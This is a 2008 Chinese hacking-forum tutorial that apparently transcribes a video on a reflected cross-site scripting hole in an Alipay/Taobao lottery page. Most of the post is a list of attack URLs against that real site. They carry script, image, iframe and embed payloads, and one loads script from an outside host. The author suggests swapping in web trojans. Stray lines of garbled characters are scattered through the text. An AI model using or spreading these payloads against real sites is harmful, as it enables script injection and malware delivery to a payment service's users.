淘宝的xss跨站漏洞

软件简介：
2 R. b1 P2 l* ~) [8 ]大家好 我是凯文比比奇
今天给大家带来一个关于xss跨站的教程
: h8 y! l) o% F# n# {- w" y这是漏洞地址http://union.alipay.com/alipay/choujiang1/order.php
好了`大家看我操作啦 是淘宝的
% C) h5 ?+ p( j" J2 b: q) E2 i看到了没
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=%3Cstrong%3E%B7%C7%B3%A3%B8%D0%D0%BB%C4%FA%B5%C4%B2%CE%D3%EB%A3%AC%B4%CB%BD%BB%D2%D7%BA%C5%B2%BB%C4%DC%B2%CE%D3%EB%B8%C3%CA%B1%B6%CE%B9%CE%BD%B1%0D%0A%CD%AC%CA%B1%C2%FA%D7%E3%D2%D4%CF%C2%CC%F5%BC%FE%B5%C4%BD%BB%D2%D7%BA%C5%BF%C9%B2%CE%D3%EB%B1%BE%C6%DA%B9%CE%BD%B1%A3%BA%3C%2Fstrong%3E%3Cbr%2F%3E%3Cul%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E%BB%EE%B6%AF%C6%DA%BC%E4%D4%DA%CC%D4%B1%A6%B9%BA%CE%EF%A3%AC%CA%D7%B4%CE%B8%B6%BF%EE%B5%BD%D6%A7%B8%B6%B1%A6%B5%C4%BD%BB%D2%D7%BA%C5%3C%2Fli%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E7%2F18-7%2F25%CD%EA%B3%C9%B8%B6%BF%EE%B5%C4%BB%E1%D4%B1%D4%DA7%2F27-8%2F1%C6%DA%BC%E4%C6%BE%B8%C3%B1%CA%BD%BB%D2%D7%B5%C4%BD%BB%D2%D7%BA%C5%B2%CE%D3%EB%B9%CE%BD%B1%3C%2Fli%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E7%2F26-7%2F31%CD%EA%B3%C9%BD%BB%D2%D7%B5%C4%BB%E1%D4%B1%D4%DA8%2F2-8%2F5%C6%DA%BC%E4%C6%BE%B8%C3%B1%CA%BD%BB%D2%D7%B5%C4%BD%BB%D2%D7%BA%C5%B2%CE%D3%EB%B9%CE%BD%B1%3C%2Fli%3E%3C%2Ful%3E
  l6 _! r  a# y" D9 o& m( K这是url编码
# G  Y  |6 i) t# K$ A$ s+ @支付宝交易号是通过http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=这个页面来传递的，而url编码是http识得的
好了，既然这样那么我们可以来构造语句，当然这里是存在xss跨站漏洞的 我们来测试一下,这样上不行的 我们再来看
  t+ {, j7 u: n8 o3 [% u$ `$ R看到了吗。是可以的，看到了没``好了，我们再来看看其他的几种xss测试代码
都行的，下面的这些测试代码我都测试过，都通过，
/ k/ ]; E$ j0 g- d0 l% b测试代码:
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=scriptalert(497751579)/script
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=SCRIPT SRC=http://ha.ckers.org/xss.js/SCRIPT这段是利用script/script标签插如js脚本
7 w* D/ @% d7 Q7 X6 W7 q& s- Thttp://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IMG SRC=javascript:alert('XSS');
2 o( y  [/ ^/ Z* E, X3 Mhttp://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IMG SRC=javascript:alert(XSS)
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IMG SRC=`javascript:alert(RSnake says, 'XSS')`这三种都是一样的
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IMG SRC=javascript:alert(String.fromCharCode(83,83,83))利用js编码fromCharCode(83,83,83)达到跨站目的
4 W* Q+ Z3 ]+ v$ W5 U8 H% _+ Hhttp://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IFRAME SRC=javascript:alert('XSS');/IFRAME框架，懂挂马的朋友都知道的
* ^3 F" z9 g6 v/ m( Fhttp://union.alipay.com/alipay/choujiang1/ordernotice.php?info=EMBED SRC=http://union.alipay.com/alipay/imagefile/market/cj_index.swf AllowScriptAccess=always/EMBED这段xss是利用html里面的embed/embed插入.swf动画
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=SCRIPT SRC=http://union.alipay.com/alipay/imagefile/market/cj_02.jpg/SCRIPT这段是src带插入图片的
; B2 P  s: @/ w; ^, Jhttp://union.alipay.com/alipay/choujiang1/ordernotice.php?info=A%20HREF=http://www.baidu.com/administrator/A超连接
: I+ N6 _" C5 h/ _0 h9 v2 m通过a href=/a来插入超连接的

" o) w7 Z. Y' x) C* u# F  R好了。来总结一下
% k( r: U- o" ~( A& ^该跨站是通过http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=地址传递html值从而存在跨站的
这个漏洞也有人发现过，这里只是通过教程发出来 让大家知道跨站的危害 ，假如我们把上面这些跨站代码里面的一些javascript脚本或是swf等利用html潜入的文件改成网马之类的就存在很大的危害噢``
' m3 A0 `5 ~; _5 s好了 教程就到这里吧 有什么不懂的问题就加我好了 Q:49771579
最后希望黑鹰管理员给我发一个邀请码咯 好方便以后去黑鹰和大家共同交流学习 Email：service-mail@163.com
" Q9 B2 h/ ]; X谢谢大家观看 拜拜``
: r+ q( F' t8 c# t4 D5 G5 M: p下载地址：

2008-8-19 15:33 上传 淘宝的xss跨站漏洞.rar

下载权限:

版本vip会员

本地下载 检测资源

有些游戏资源需要vip下载开通请点击开通vip